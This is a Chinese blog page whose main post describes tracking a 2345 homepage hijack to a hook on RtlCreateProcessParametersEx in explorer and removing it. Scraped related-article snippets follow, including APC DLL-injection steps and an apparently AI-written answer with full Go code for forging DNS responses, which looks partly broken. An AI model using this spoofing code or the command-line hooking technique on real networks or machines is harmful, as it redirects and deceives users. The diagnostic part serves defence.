记录一个首页劫持

破解2345首页劫持
最新推荐文章于 2025-08-15 09:24:21 发布
原创 最新推荐文章于 2025-08-15 09:24:21 发布 · 2.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种常见的浏览器首页劫持现象,并详细分析了通过hook RtlCreateProcessParametersEx函数实现首页锁定的技术细节。

这几天老是碰到奇怪的莫名其妙的首页劫持发生,于是今天抽时间看了一下,首页被劫持到 2345 导航。


首先拿 PCHunter 扫了一下 网络相关的接口,并没有发现什么异常发生,看了一下驱动模块,也没发现特别奇怪的模块。


接着检查了一下 进程通知回调,也没发现什么特别的东西。


于是进一步检查 是不是 explorer进程被hook了。


果然钩子一扫就出来了。。


被挂钩的地方是 RtlCreateProcessParametersEx。这个函数。


这个函数用于创建进程过程中被调用来创建一个进程环境变量块。



关于这个函数可以看看 看雪的分析帖 http://www.pediy.com/kssd/pediy11/114611.html  不多说。


由于hook掉它可以 看到进程的  imagepath 以及 commandline 等参数,,修改掉 commanline 就可以带参数打开浏览器,于是就可以实现锁首了。


进一步打开 windbg_x64 。附加到 explorer上面 对这个函数下断点,跟入 就可以找到它的模块,由于模块 放在了 system32 目录下,且 加了vmp保护,所以这里不再进一步分析了,删掉模块,恢复钩子就行了。


本文主要是展示一种现行可用的锁首思路。

FadeTrack
关注
浏览器主页被hao123劫持的解决方案
weixin_43178406的博客
03-06 2万+
本文主要介绍了浏览器主页被hao123劫持的解决方案,希望能对新手有所帮助。 在这里插入图片描述 文章目录 1. 问题描述 2. 解决方案
浏览器首页被2345、hao123锁定了,怎么办
qq_49671953的博客
11-25 7237
昨天突然发现用chrome浏览器首页被2345劫持、好久之前msedge浏览器也被hao123锁定了,一直修改不了,但是平时不怎么用,所以没怎么管,这次chrome浏览器首页又被2345劫持首页我看得头晕。
浏览器主页劫持
12-26
主页被锁定,无法还原,非常讨厌,就算按照网上一般方法重新设置,过半个小时还是出现问题
主页劫持该怎么办?解决主页劫持的方法
hua520064的博客
01-10 3091
主页劫持是一种恶意程序,通过浏览器插件、BHO(浏览器辅助对象)、Winsock LSP等形式对用户的浏览器进行篡改,使用户的浏览器配置不正常,被强行引导到商业网站。 所谓浏览器劫持是指网页浏览器(IE等)被恶意程序修改。 IIS7网站监控可以及时防控网站风险,快速准确监控网站是否遭到各种劫持攻击,网站在全国是否能正常打开(查看域名是否被墙),精准的DNS污染检测,具备网站打开速度检测功能,第一时间知道网站是否被黑、被入侵、被改标题、被挂黑链。精益求精的产品,缺陷为零数据提供! 它可以做到以下功能: 1、检
【小技巧】2345——劫持IE浏览器主页
Kannoame_Ling00的博客
10-25 1810
前言:https://blog.youkuaiyun.com/weixin_46366744/article/details/107047703 一些解决流氓弹窗、广告、挖矿等问题的小技巧。 环境:win10。 均为本人搜索、总结出来的一些简单方法。 计算机小白,如有问题请及时提出,见谅。 侵删。 【小技巧】专栏中,有关于卸载2345、劫持chrome浏览器主页劫持edge浏览器主页的文章,感兴趣的话可在博客主页寻找查看。 该文是在2345已被消灭(但...
浏览器主页被360劫持
wpg_boke的博客
03-27 8457
浏览器主页被360劫持、360篡改edge主页根治
2345浏览器劫持主页解决办法
ahs74497的博客
03-25 921
今天给人装了Win7系统,由于是2018年产的笔记本,一时间找不到Win7的驱动,只能使用万能驱动助理(WanDrv)来安装驱动,安装之后,就带上了一个垃圾:2345浏览器。 卸载这个垃圾之后,发现IE主页被锁死(Chrome倒没事),而且不是以前遇过的那种快捷方式尾巴病毒(尾巴病毒清除请参考我的另一篇博文:hao123.com劫持), 具体的病征就是:可以在IE中设置首页,但设置完...
一个比较稳定的API劫持代码APIHookX86X64.rar
09-11
在标题“一个比较稳定的API劫持代码APIHookX86X64.rar”中,提及的是一个针对X86和X64架构的API劫持代码库。X86指的是32位处理器架构,而X64则指64位处理器架构。这个压缩包可能包含了一个稳定实现API Hooking的源码...
百度快照劫持之JS劫持诊断与恢复一例
西数科技-专注于数据恢复与司法鉴定
09-08 1836
jQuery比较大的优势是,它的文档说明很全,而且各种应用也说得很详细,同时还有许多成熟的插件可供选择。3:再一细想,百度搜索后的链接进行转换,方法在搜索之后点击会有一个百度链接,复制后转换,得到自己网站链接,这个链接是正是有效的, 那么一个合法链接如何打开后跳转一次到彩票网站呢?百度搜索结果中,被劫持网站出现在搜索结果中, 点击进入网站,网站显示正常,数秒后网站自动跳转到彩票网站f51688.com/ff6/。min.js是压缩js的压缩版,比js的要小,内容是一样的,js版是源码,可以很容易的更改。
一种通用DLL劫持技术研究
11-29
- **修改PEB LDR Data**:每个进程都有一个进程环境块(PEB),其中包含了一个链接器数据表(LDR Data Table),记录了当前进程所加载的所有DLL的信息。通过修改这个数据表,可以改变`LoadLibrary`返回的模块句柄。...
cpp-pwnmbr一个简单的MBR劫持示范
08-16
【标题】:“cpp-pwnmbr一个简单的MBR劫持示范” 在计算机安全领域,MBR(Master Boot Record,主引导记录劫持是一种常见的攻击手段,它涉及到操作系统启动过程中的底层控制。"cpp-pwnmbr"项目是用C++语言编写的...
vc++调用hook API钩子截获CreateFile和CloseHandle来加密WORD文件+实现文件防拷贝_chorus和hook区别
12-26
利用API Hook截获CreateFile和CloseHandle达到加解密DOC文件和防拷贝的目的 visual c++调用hook API钩子截获CreateFile和CloseHandle来加密WORD文件+实现文件防拷贝
https劫持代理和数据包劫持代理例子程序
05-25
HTTPS劫持代理,通常发生在用户的网络流量经过一个恶意代理服务器时。攻击者会通过中间人攻击(Man-in-the-Middle, MITM)的方式,假装成合法的服务器或者客户端,获取并可能篡改通信中的数据。例如,攻击者可能会...
教你解决浏览器被360劫持篡改主页的麻烦
热门推荐
m0_73421035的博客
04-11 4万+
360呢作为国内首屈一指的安全卫士(病毒),真是无处不在。其流氓属性还是数一数二的。就算你电脑本地没有下载任何关于360的东西,但是你的浏览器还是可能会被360给劫持。出现该情况的原因是360导航的网址被设置为了默认的首页,这可能与你不小心点到了什么网页,或者下了一个被360入侵的软件等等都有可能。好了,不多吐槽,下面我来讲讲怎么有效解决这个麻烦。解决办法。
全面解决IE等浏览器主页被hao123劫持的方法指南
最新发布
weixin_33773084的博客
08-15 1516
启动项是计算机启动时自动运行的一系列程序和服务。它们通常由操作系统管理,但有时候也会被恶意软件利用。一个好的启动项配置对于系统启动速度和性能有着显著的影响。在理想情况下,启动项应包括系统必须的服务以及用户希望立即启动的应用程序,而不应包括任何不必要的第三方软件或恶意代码。
桌面浏览器被劫持,每次打开都是那个页面,让人很心烦……作为一个程序员我应该做点什么
sdf295953的专栏
09-29 429
无论什么浏览器,只要你放在桌面上,打开就会跳转到一个恶心的页面 但是你到浏览器的安装目录就没事。这种问题怎么解决呢? 作为一个程序员,我决定以毒攻毒 首先:把浏览器的安装目录添加到环境变量的path里面 保证你在打开cmd的时候,输入浏览器的名称能够运行浏览器 第二:自己做个程序,程序里面直接调用cmd的命令。 如果想要简单的话,你可以直接省略第一步。 ...
APC_dll注入
qq_36918532的博客
03-03 573
主要是以下五步 //注入器 //1.要注入到进程中首先要拿到进程ID //2.获取到LoadLibrary地址 //3.在目标程序的体内开辟一块内存,用来写入dll地址 //4.遍历线程-随便选一个目标进程的线程获取句柄 //5.插入APC,把LoadLibrary作为APC的回调参数,然后把目标进程的dll地址作为参数 #include<stdio.h> #include<stdlib.h> #include<Windows.h> #include<TlHelp3
vc在x64体系的一般传参数方式
weixin_30725315的博客
12-28 389
前篇分析过在objc中函数调用传参的一般方式,本篇分析vc在x64体系中的一般传参方式。手头上因为没有64位的vc编译器,只好用windbg看ms自身的函数是怎么样调用的。 首先看两个再熟悉不过的api,memset和CreateHeap。函数原型和使用像呼吸一样了,也不用多解释一看就明白。 调用memset(rcx, rdx, r8): 00000000`76df5f63 488...
用go实现一个dns dpi劫持方案
05-02
<think>好的,我现在需要回答用户的问题:用Go实现一个DNSDPI劫持方案。首先,我需要明确DNS DPI劫持的概念。DPI是深度包检测,所以DNS DPI劫持应该是通过分析网络数据包的内容,识别DNS请求,然后伪造响应,将域名解析到指定的IP地址。这可能用于某些网络管理或测试,但需要注意合法性问题。 接下来,用户希望用Go语言实现这个方案。我需要考虑几个步骤:监听网络流量、解析DNS请求、判断是否需要劫持、构造并发送伪造的响应。 首先,监听网络流量。在Go中,可以使用gopacket库来处理数据包捕获。需要打开一个网络接口,设置过滤器只捕获DNS查询(通常是UDP端口53)。然后循环读取数据包。 然后,解析DNS请求。每个捕获到的数据包需要被解析成DNS结构,检查是否是查询请求(QR位为0)。如果是,提取其中的域名和查询类型(比如A记录)。接下来,判断是否需要劫持。可能需要一个域名列表或匹配规则,比如特定域名或通配符。例如,如果请求的域名匹配到列表中的项,就进行劫持,否则转发到真实DNS服务器。 构造伪造的响应。需要构建一个DNS响应包,设置QR位为1(响应),Answer部分包含伪造的IP地址。要注意ID、问题部分与原请求一致,同时设置TTL等字段。 发送响应。由于DNS通常使用UDP,可以通过原始套接字发送构造的响应包,或者直接回复到请求的来源端口。需要注意的是,有些网络环境下可能需要处理权限问题,比如需要以管理员权限运行。 在代码实现时,需要注意处理网络字节序、DNS报文格式的正确性。此外,可能需要处理并发问题,因为数据包可能同时到达。然后,我需要考虑示例代码的结构。导入必要的库,如gopacket、layers等。打开设备进行抓包,设置BPF过滤器。处理每个数据包,解析各层(如以太网、IP、UDP、DNS)。如果检测到DNS查询,检查域名是否在劫持列表,构造响应并发送。 在代码解释中,需要说明每个部分的作用,比如如何构造响应包,如何设置各层头部信息,如何计算校验和等。同时,要提醒用户注意法律和道德问题,只能在合法授权的情况下使用此代码。相关问题部分,需要考虑用户可能的后续问题,比如DPI的绕过、其他劫持方法、DNS协议的其他操作、Go处理网络包的其他应用等。总结下来,我需要提供详细的代码示例,解释各部分功能,并强调合法性。同时,列出相关问题,帮助用户深入理解相关技术。</think>需要明确说明:DNS劫持属于非法网络行为,本文仅用于技术研究目的。实际应用中必须遵守当地法律法规,只能在合法授权范围内使用。 以下是用Go实现的DNS响应伪造示例(基于DPI识别): ```go package main import ( "bytes" "net" "time" "github.com/google/gopacket" "github.com/google/gopacket/layers" "github.com/google/gopacket/pcap" ) var ( device = "eth0" snapshot_len = int32(1024) promiscuous = false err error timeout = 30 * time.Second handle *pcap.Handle ) // 劫持规则:要劫持的域名和对应的伪造IP var hijackRules = map[string]string{ "example.com": "192.0.2.1", "test.com": "203.0.113.2", } func main() { // 打开网络设备 handle, err = pcap.OpenLive(device, snapshot_len, promiscuous, timeout) if err != nil { panic(err) } defer handle.Close() // 设置BPF过滤器(只捕获DNS查询) err = handle.SetBPFFilter("udp and port 53") if err != nil { panic(err) } // 开始抓包 packetSource := gopacket.NewPacketSource(handle, handle.LinkType()) for packet := range packetSource.Packets() { go processPacket(packet) } } func processPacket(packet gopacket.Packet) { // 解析网络层 ipLayer := packet.Layer(layers.LayerTypeIPv4) if ipLayer == nil { return } ip, _ := ipLayer.(*layers.IPv4) // 解析传输层 udpLayer := packet.Layer(layers.LayerTypeUDP) if udpLayer == nil { return } udp, _ := udpLayer.(*layers.UDP) // 解析DNS层 dnsLayer := packet.Layer(layers.LayerTypeDNS) if dnsLayer == nil { return } dns, _ := dnsLayer.(*layers.DNS) // 只处理DNS查询 if !dns.QR { if len(dns.Questions) > 0 { question := dns.Questions[0] domain := string(question.Name) // 检查是否需要劫持 if fakeIP, ok := hijackRules[domain]; ok { sendFakeResponse(ip, udp, dns, fakeIP) } } } } func sendFakeResponse(ip *layers.IPv4, udp *layers.UDP, dns *layers.DNS, fakeIP string) { // 交换源目地址 srcIP := ip.DstIP dstIP := ip.SrcIP srcPort := udp.DstPort dstPort := udp.SrcPort // 构造DNS响应 response := &layers.DNS{ ID: dns.ID, QR: true, // 响应标志 OpCode: dns.OpCode, QDCount: dns.QDCount, Questions: dns.Questions, Answers: []layers.DNSResourceRecord{ { Name: dns.Questions[0].Name, Type: layers.DNSTypeA, Class: layers.DNSClassIN, TTL: 300, IP: net.ParseIP(fakeIP), }, }, } // 构造各层包头 eth := &layers.Ethernet{ SrcMAC: packet.Metadata().CaptureInfo.Interface.HardwareAddr, DstMAC: packet.Metadata().LinkLayer().(*layers.Ethernet).SrcMAC, EthernetType: layers.EthernetTypeIPv4, } ipv4 := &layers.IPv4{ Version: 4, Protocol: layers.IPProtocolUDP, SrcIP: srcIP, DstIP: dstIP, } udp = &layers.UDP{ SrcPort: srcPort, DstPort: dstPort, } udp.SetNetworkLayerForChecksum(ipv4) // 序列化数据包 buf := gopacket.NewSerializeBuffer() opts := gopacket.SerializeOptions{ ComputeChecksums: true, FixLengths: true, } gopacket.SerializeLayers(buf, opts, eth, ipv4, udp, response, ) // 发送伪造的响应包 err := handle.WritePacketData(buf.Bytes()) if err != nil { panic(err) } } ``` 代码解释: 1. 使用gopacket库进行原始数据包捕获和处理 2. 设置BPF过滤器捕获DNS查询(UDP 53端口) 3. 通过hijackRules定义需要劫持的域名和对应的伪造IP 4. processPacket函数解析数据包各层并判断是否需要劫持 5. sendFakeResponse构造伪造的DNS响应包: - 交换源目IP和端口 - 设置DNS响应标志位(QR=1) - 包含伪造的DNS记录 6. 使用原始套接字发送构造的响应包 注意事项: 1. 需要root权限运行 2. 需要禁用系统本身的DNS响应(如关闭53端口服务) 3. 需要处理TCP DNS查询(当前仅处理UDP) 4. 需要处理DNS缓存和重传机制
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值